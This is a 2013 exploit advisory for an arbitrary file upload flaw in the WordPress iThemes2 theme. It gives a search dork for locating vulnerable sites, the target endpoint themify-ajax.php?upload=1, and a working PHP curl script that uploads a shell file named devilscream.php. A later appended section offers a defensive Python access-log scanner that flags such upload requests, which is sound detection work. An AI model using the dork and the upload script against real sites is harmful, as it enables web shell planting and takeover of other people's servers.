WordPress iThemes2 Shell Upload

############################################################
#Title                : WordPress iThemes2 Themes Arbitrary File Upload
#Author            : DevilScreaM
#Date               : 11/20/2013 - 20 November 2013
#Category        : Web Applications
#Type               : PHP
#Vendor           : http://themify.me/
#Link                 : http://themify.me/themes/ithemes2
#Greetz             : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
                             Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Indonesian Coder
#Thanks           : ShadoWNamE | gruberr0r | Win32Conficker | Xrwrr | Rec0ded
#Tested            : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability  : Arbitrary File Upload
############################################################


Dork :
inurl:wp-content/themes/ithemes2
Exploit :

http://SITE-TARGET/wp-content/themes/ithemes2/themify/themify-ajax.php
Script :
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
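
For defenders, the request this script sends (a POST to themify-ajax.php carrying the upload query parameter) stands out in web server access logs. The following is an added example, not part of the original advisory: it scans Combined Log Format lines for requests to that endpoint and classifies them. The log format, the sample lines, the verdict labels and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint path taken from the advisory; matched as a suffix so WordPress
# installs in a subdirectory are covered too.
ENDPOINT = "/wp-content/themes/ithemes2/themify/themify-ajax.php"

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize_path(raw_path):
    """Percent-decode, lowercase and collapse repeated slashes (deliberately broad)."""
    return re.sub(r"/{2,}", "/", unquote(raw_path)).lower()

def find_upload_attempts(lines):
    """Return one finding per request that touches the advisory's endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path, _, query = m["target"].partition("?")
        if not normalize_path(path).endswith(ENDPOINT):
            continue
        has_upload = "upload" in parse_qs(query, keep_blank_values=True)
        status = int(m["status"])
        if m["method"] == "POST" and has_upload:
            # A 2xx answer means the handler ran: review the site for new files.
            verdict = "upload-accepted" if 200 <= status < 300 else "upload-rejected"
        else:
            verdict = "probe"
        findings.append({"ip": m["ip"], "time": m["time"],
                         "status": status, "verdict": verdict})
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Nov/2013:10:01:02 +0000] "GET /wp-content/themes/ithemes2/themify/themify-ajax.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [20/Nov/2013:10:01:05 +0000] "POST /wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.9 - - [20/Nov/2013:10:02:00 +0000] "POST /blog//wp-content/themes/iThemes2/themify/themify%2Dajax.php?upload=1 HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.4 - - [20/Nov/2013:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_attempts(SAMPLE_LOG):
        print(finding)
```

Any "upload-accepted" finding is a reason to audit the web root for unexpected PHP files and to remove or update the theme.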
